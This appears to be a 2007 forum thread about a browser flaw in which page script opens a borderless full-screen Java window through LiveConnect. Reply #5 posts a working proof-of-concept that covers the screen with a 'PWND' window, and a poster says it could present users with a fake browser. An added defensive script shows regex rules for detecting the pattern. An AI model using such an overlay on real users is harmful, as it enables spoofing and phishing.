Author Topic: Full screen Java popup  (Read 5050 times)


Offline chuck

Full screen Java popup
« on: August 08, 2007, 02:31:21 pm »
http://hackademix.net/2007/08/07/java-evil-popups

Kind of scary, but I can still see my menu bar on a Mac, so I know what's real and what's not. Also, a simple cmd+w closes it, so much for not being able to close it!
Chucks Blog
JavaOp2 Plugins

Quote
Error, keyboard not connected. Press F1 to continue.

Offline Newby

Re: Full screen Java popup
« Reply #1 on: August 08, 2007, 02:48:18 pm »
... and if you disable java altogether, there's no problem! :D
- Newby
http://www.x86labs.org

Quote
[17:32:45] * xar sets mode: -oooooooooo algorithm ban chris cipher newby stdio TehUser tnarongi|away vursed warz
[17:32:54] * xar sets mode: +o newby
[17:32:58] <xar> new rule
[17:33:02] <xar> me and newby rule all

I'd bet that you're currently bloated like a water balloon on a hot summer's day.

That analogy doesn't even make sense.  Why would a water balloon be especially bloated on a hot summer's day? For your sake, I hope there wasn't too much logic testing on your LSAT. 

Offline iago

Re: Full screen Java popup
« Reply #2 on: August 08, 2007, 02:52:31 pm »
Noscript for the win. :)

Offline Hdx

Re: Full screen Java popup
« Reply #3 on: August 08, 2007, 10:12:28 pm »
I was able to have it go truly fullscreen only when I
1) Unlocked my tray
2) closed all 'docked' windows (Trillian, widgets, etc.)
So..? Not that impressive.
~Hdx
http://img140.exs.cx/img140/6720/hdxnew6lb.gif
09/08/05 - Clan SBs @ USEast
 [19:59:04.000] <DeadHelp> We don't like customers.
 [19:59:05.922] <DeadHelp> They're assholes
 [19:59:08.094] <DeadHelp> And they're never right.

Offline iago

Re: Full screen Java popup
« Reply #4 on: August 08, 2007, 10:18:42 pm »
A lot of people don't have docked programs, so it is rather impressive. And even if it covers your browser only, if you use this to present the user with a fake browser, you can potentially do a lot of damage.

Offline Joe

Re: Full screen Java popup
« Reply #5 on: August 15, 2007, 08:40:53 am »
In case anyone's wondering, I tried this on my dual monitor set up. When I ran the JavaScript test (I'm on Firefox, so, Gecko-based) the PWND window showed up on my default monitor, but the taskbar still showed. My secondary monitor, which I (luckily?) was browsing on at the time, was unaffected.

Apparently I'm in the safe zone. And congrats to iago on 12,000 posts.

EDIT -
Code:
function popup() {
  // LiveConnect exposes a global "java" object to page script.
  // Without it (or with Java disabled) only a notice is shown.
  if(typeof(java) == "undefined") {
    window.onload = function() {
      document.getElementById("nojava").innerHTML =
         "Your browser doesn't support LiveConnect or you've got Java disabled!";
    };
    return;
  }
  // A java.awt.Window has no title bar, border or close button.
  var w = new java.awt.Window(new java.awt.Frame());
  var label = new java.awt.Label("PWND");
  label.setFont(new java.awt.Font("Serif", java.awt.Font.BOLD, 80));
  label.setAlignment(label.CENTER);
  label.setForeground(java.awt.Color.white);
  w.setBackground(java.awt.Color.black);
  w.setLayout(new java.awt.BorderLayout());
  w.add(label, java.awt.BorderLayout.CENTER);
  w.setLocation(0, 0);
  // Size the window to the reported screen size, extended by 80 pixels in height.
  var d = java.awt.Toolkit.getDefaultToolkit().getScreenSize();
  d.height += 80;
  w.setSize(d);
  w.setVisible(true);
}

And I'm sort of laughing a bit now that I realize this can be exploited in Firefox and not Internet Exploder. Wait, what?!?!
« Last Edit: August 15, 2007, 08:43:05 am by Joe[x86/64] »
I'd personally do as Joe suggests

You might be right about that, Joe.
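
A defender-side check for the pattern in the snippet posted above, as an added example that is not part of the thread or of the linked article: it scans script text for a LiveConnect top-level window that is sized from the screen dimensions and shown. The rule names, verdict strings and sample inputs are constructed for illustration.

```javascript
// Added example, not from the thread. Rule ids and samples are constructed.
const RULES = [
  // Any reference to the LiveConnect bridge objects exposed to page script.
  { id: "liveconnect-global",
    re: /\b(?:java|Packages)\s*\.\s*(?:awt|lang|applet|io|net)\b/ },
  // A top-level AWT/Swing window created directly from script.
  { id: "toplevel-window",
    re: /new\s+(?:Packages\s*\.\s*)?javax?\s*\.\s*(?:awt|swing)\s*\.\s*(?:Window|Frame|Dialog|JWindow|JFrame)\s*\(/ },
  // The script asks for the screen dimensions.
  { id: "screen-size-query",
    re: /getDefaultToolkit\s*\(\s*\)\s*\.\s*getScreenSize\s*\(/ },
  // The window is made visible.
  { id: "window-shown", re: /\.\s*setVisible\s*\(\s*true\s*\)/ },
];

// Drop // and /* */ comments but keep string literals, so commented-out
// code is ignored while code held in strings (eval input) is still seen.
function stripComments(src) {
  const re = /("(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*')|\/\*[\s\S]*?\*\/|\/\/[^\n]*/g;
  return src.replace(re, (m, str) => (str ? str : " "));
}

// Returns the matched rule ids and a verdict for one script body.
function scanScript(src) {
  const code = stripComments(src);
  const hits = RULES.filter((r) => r.re.test(code)).map((r) => r.id);
  const overlay = ["toplevel-window", "screen-size-query", "window-shown"]
    .every((id) => hits.includes(id));
  const verdict = overlay ? "fullscreen-overlay"
    : hits.includes("liveconnect-global") ? "liveconnect-use" : "clean";
  return { verdict, hits };
}

// Constructed samples: the thread's pattern, a plain LiveConnect probe,
// and a benign script that only mentions the class in a comment.
const SAMPLE_POPUP = `var w = new java.awt.Window(new java.awt.Frame());
var d = java.awt.Toolkit.getDefaultToolkit().getScreenSize();
w.setSize(d); w.setVisible(true);`;
const SAMPLE_PROBE = `var v = java.lang.System.getProperty("java.version");`;
const SAMPLE_BENIGN = `// old demo called new java.awt.Window(...) here
var msg = "see http://example.test/docs";
window.open("/help", "help", "width=400,height=300");`;

for (const [name, src] of Object.entries({ SAMPLE_POPUP, SAMPLE_PROBE, SAMPLE_BENIGN })) {
  console.log(name, JSON.stringify(scanScript(src)));
}
```

This is a pattern match on source text, so obfuscated or dynamically built script will not be caught by it; blocking script or Java for untrusted sites, as suggested earlier in the thread, does not depend on recognising the code.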


Offline iago

Re: Full screen Java popup
« Reply #6 on: August 15, 2007, 08:50:41 am »
This is reportedly exploitable on all major browsers (IE, FF, Opera).

Offline Joe

Re: Full screen Java popup
« Reply #7 on: August 16, 2007, 02:57:01 am »
Eh, it's much easier in Firefox, since in IE you need to download the whole applet and whatnot. It's still as easy to get sucked in, but Firefox facilitates it being done easier for the programmer.


Offline Chavo

Re: Full screen Java popup
« Reply #8 on: August 16, 2007, 11:37:56 am »
Quote from: iago
Noscript for the win. :)

Noscript is not worth the huge pain in the ass that it is. This should be a fairly easy to fix exploit.

Offline iago

Re: Full screen Java popup
« Reply #9 on: August 16, 2007, 12:43:59 pm »
Quote from: iago
Noscript for the win. :)
Quote from: Chavo
Noscript is not worth the huge pain in the ass that it is. This should be a fairly easy to fix exploit.

I don't consider it a pain at all, I have it installed on all my computers. Most good sites (including the SMF forum) can operate 100% without JavaScript.

Offline Hitmen

Re: Full screen Java popup
« Reply #10 on: August 16, 2007, 12:51:55 pm »
I think the internet isn't worth the huge pain in the ass that it is without noscript :|
Quote
(22:15:39) Newby: it hurts to swallow